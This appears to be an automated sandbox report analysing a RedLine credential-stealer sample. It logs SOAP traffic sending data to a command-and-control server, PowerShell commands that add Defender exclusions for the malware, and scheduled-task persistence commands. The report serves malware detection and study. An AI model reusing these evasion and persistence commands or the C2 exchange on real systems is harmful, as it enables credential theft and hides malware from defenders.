                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>103.138.49.165</b:string><b:string>116.23.16.120</b:string><b:string>122.239.112.123</b:string><b:string>113.101.58.220</b:string><b:string>172.174.62.166</b:string><b:string>113.111.39.109</b:string><b:string>123.161.218.204</b:string><b:string>125.91.190.66</b:string><b:string>139.186.206.86</b:string><b:string>139.186.206.86</b:string><b:string>139.186.206.86</b:string><b:string>113.128.50.41</b:string><b:string>119.250.241.28</b:string><b:string>175.8.165.91</b:string><b:string>106.117.49.4</b:string><b:string>113.117.61.95</b:string><b:string>1.192.39.26</b:string><b:string>125.94.3.228< [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.449741185.222.58.80556157204C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 13, 2024 21:02:27.293737888 CEST221OUTPOST / HTTP/1.1
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                              Host: 185.222.58.80:55615
                                                                              Content-Length: 930524
                                                                              Expect: 100-continue
                                                                              Accept-Encoding: gzip, deflate
                                                                              Oct 13, 2024 21:02:27.902607918 CEST25INHTTP/1.1 100 Continue
                                                                              Oct 13, 2024 21:02:28.762758017 CEST294INHTTP/1.1 200 OK
                                                                              Content-Length: 147
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:28 GMT
                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                              Oct 13, 2024 21:02:28.793237925 CEST217OUTPOST / HTTP/1.1
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                              Host: 185.222.58.80:55615
                                                                              Content-Length: 930516
                                                                              Expect: 100-continue
                                                                              Accept-Encoding: gzip, deflate
                                                                              Oct 13, 2024 21:02:28.973356962 CEST25INHTTP/1.1 100 Continue
                                                                              Oct 13, 2024 21:02:29.657418013 CEST408INHTTP/1.1 200 OK
                                                                              Content-Length: 261
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:29 GMT
                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.449742185.222.58.80556157728C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 13, 2024 21:02:27.787668943 CEST240OUTPOST / HTTP/1.1
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                              Host: 185.222.58.80:55615
                                                                              Content-Length: 137
                                                                              Expect: 100-continue
                                                                              Accept-Encoding: gzip, deflate
                                                                              Connection: Keep-Alive
                                                                              Oct 13, 2024 21:02:28.366475105 CEST359INHTTP/1.1 200 OK
                                                                              Content-Length: 212
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:28 GMT
                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                              Oct 13, 2024 21:02:33.495413065 CEST223OUTPOST / HTTP/1.1
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                              Host: 185.222.58.80:55615
                                                                              Content-Length: 144
                                                                              Expect: 100-continue
                                                                              Accept-Encoding: gzip, deflate
                                                                              Oct 13, 2024 21:02:33.672224045 CEST25INHTTP/1.1 100 Continue
                                                                              Oct 13, 2024 21:02:33.777941942 CEST1236INHTTP/1.1 200 OK
                                                                              Content-Length: 9183
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:33 GMT
                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>103.138.49.165</b:string><b:string>116.23.16.120</b:string><b:string>122.239.112.123</b:string><b:string>113.101.58.220</b:string><b:string>172.174.62.166</b:string><b:string>113.111.39.109</b:string><b:string>123.161.218.204</b:string><b:string>125.91.190.66</b:string><b:string>139.186.206.86</b:string><b:string>139.186.206.86</b:string><b:string>139.186.206.86</b:string><b:string>113.128.50.41</b:string><b:string>119.250.241.28</b:string><b:string>175.8.165.91</b:string><b:string>106.117.49.4</b:string><b:string>113.117.61.95</b:string><b:string>1.192.39.26</b:string><b:string>125.94.3.228< [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.449748185.222.58.80556157728C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 13, 2024 21:02:37.154263973 CEST221OUTPOST / HTTP/1.1
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                              Host: 185.222.58.80:55615
                                                                              Content-Length: 930112
                                                                              Expect: 100-continue
                                                                              Accept-Encoding: gzip, deflate
                                                                              Oct 13, 2024 21:02:38.705321074 CEST294INHTTP/1.1 200 OK
                                                                              Content-Length: 147
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:38 GMT
                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.449749185.222.58.80556157728C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 13, 2024 21:02:38.713823080 CEST241OUTPOST / HTTP/1.1
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                              Host: 185.222.58.80:55615
                                                                              Content-Length: 930104
                                                                              Expect: 100-continue
                                                                              Accept-Encoding: gzip, deflate
                                                                              Connection: Keep-Alive
                                                                              Oct 13, 2024 21:02:40.140948057 CEST408INHTTP/1.1 200 OK
                                                                              Content-Length: 261
                                                                              Content-Type: text/xml; charset=utf-8
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Sun, 13 Oct 2024 19:02:40 GMT
                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:15:02:07
                                                                              Start date:13/10/2024
                                                                              Path:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\PZNfhfaj9O.exe"
                                                                              Imagebase:0x9b0000
                                                                              File size:706'568 bytes
                                                                              MD5 hash:01D452E81B85A3D399A247852F2F5004
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe"
                                                                              Imagebase:0x480000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CiENBY.exe"
                                                                              Imagebase:0x480000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp"
                                                                              Imagebase:0x960000
                                                                              File size:187'904 bytes
                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\PZNfhfaj9O.exe"
                                                                              Imagebase:0x3d0000
                                                                              File size:706'568 bytes
                                                                              MD5 hash:01D452E81B85A3D399A247852F2F5004
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\PZNfhfaj9O.exe"
                                                                              Imagebase:0xb10000
                                                                              File size:706'568 bytes
                                                                              MD5 hash:01D452E81B85A3D399A247852F2F5004
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:10
                                                                              Start time:15:02:14
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:15:02:15
                                                                              Start date:13/10/2024
                                                                              Path:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              Imagebase:0xa60000
                                                                              File size:706'568 bytes
                                                                              MD5 hash:01D452E81B85A3D399A247852F2F5004
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              Antivirus matches:
                                                                              • Detection: 61%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:15:02:16
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                              Imagebase:0x7ff693ab0000
                                                                              File size:496'640 bytes
                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:15
                                                                              Start time:15:02:23
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp5461.tmp"
                                                                              Imagebase:0x960000
                                                                              File size:187'904 bytes
                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:16
                                                                              Start time:15:02:23
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:18
                                                                              Start time:15:02:24
                                                                              Start date:13/10/2024
                                                                              Path:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\CiENBY.exe"
                                                                              Imagebase:0x450000
                                                                              File size:706'568 bytes
                                                                              MD5 hash:01D452E81B85A3D399A247852F2F5004
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:19
                                                                              Start time:15:02:24
                                                                              Start date:13/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:10.5%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:220
                                                                                Total number of Limit Nodes:16
                                                                                execution_graph 28530 2cdd458 28531 2cdd49e GetCurrentProcess 28530->28531 28533 2cdd4e9 28531->28533 28534 2cdd4f0 GetCurrentThread 28531->28534 28533->28534 28535 2cdd52d GetCurrentProcess 28534->28535 28536 2cdd526 28534->28536 28537 2cdd563 28535->28537 28536->28535 28538 2cdd58b GetCurrentThreadId 28537->28538 28539 2cdd5bc 28538->28539 28540 2cd4668 28541 2cd467a 28540->28541 28542 2cd4686 28541->28542 28546 2cd4781 28541->28546 28551 2cd3e34 28542->28551 28544 2cd46b1 28547 2cd47a5 28546->28547 28555 2cd4881 28547->28555 28559 2cd4890 28547->28559 28552 2cd3e3f 28551->28552 28567 2cd5c80 28552->28567 28554 2cd7001 28554->28544 28557 2cd4890 28555->28557 28556 2cd4994 28557->28556 28563 2cd44b4 28557->28563 28561 2cd48b7 28559->28561 28560 2cd4994 28561->28560 28562 2cd44b4 CreateActCtxA 28561->28562 28562->28560 28564 2cd5920 CreateActCtxA 28563->28564 28566 2cd59e3 28564->28566 28568 2cd5c8b 28567->28568 28571 2cd5ca0 28568->28571 28570 2cd7105 28570->28554 28572 2cd5cab 28571->28572 28575 2cd5cd0 28572->28575 28574 2cd71e2 28574->28570 28576 2cd5cdb 28575->28576 28579 2cd5d00 28576->28579 28578 2cd72e5 28578->28574 28580 2cd5d0b 28579->28580 28581 2cd8390 28580->28581 28587 2cd8639 28580->28587 28583 2cd85eb 28581->28583 28592 2cdac99 28581->28592 28582 2cd8629 28582->28578 28583->28582 28596 2cdcd80 28583->28596 28588 2cd861a 28587->28588 28590 2cd8647 28587->28590 28589 2cd8629 28588->28589 28591 2cdcd80 2 API calls 28588->28591 28589->28581 28590->28581 28591->28589 28601 2cdaccf 28592->28601 28605 2cdacd0 28592->28605 28593 2cdacae 28593->28583 28597 2cdcdb1 28596->28597 28598 2cdcdd5 28597->28598 28619 2cdcf2f 28597->28619 28623 2cdcf40 28597->28623 28598->28582 28609 2cdadc8 28601->28609 28614 2cdadc7 28601->28614 28602 2cdacdf 28602->28593 28606 2cdacdf 28605->28606 28607 2cdadc8 GetModuleHandleW 28605->28607 28608 2cdadc7 GetModuleHandleW 28605->28608 28606->28593 28607->28606 28608->28606 28610 2cdadfc 28609->28610 28611 2cdadd9 28609->28611 28610->28602 28611->28610 28612 2cdb000 GetModuleHandleW 28611->28612 28613 2cdb02d 28612->28613 28613->28602 28615 2cdadfc 28614->28615 28616 2cdadd9 28614->28616 28615->28602 28616->28615 28617 2cdb000 GetModuleHandleW 28616->28617 28618 2cdb02d 28617->28618 28618->28602 28620 2cdcf40 28619->28620 28621 2cdcf87 28620->28621 28627 2cdb7a0 28620->28627 28621->28598 28624 2cdcf4d 28623->28624 28625 2cdb7a0 2 API calls 28624->28625 28626 2cdcf87 28624->28626 28625->28626 28626->28598 28628 2cdb7ab 28627->28628 28630 2cddc98 28628->28630 28631 2cdd0a4 28628->28631 28630->28630 28632 2cdd0af 28631->28632 28633 2cd5d00 2 API calls 28632->28633 28634 2cddd07 28633->28634 28634->28630 28637 766bb1c 28642 766e4fb 28637->28642 28657 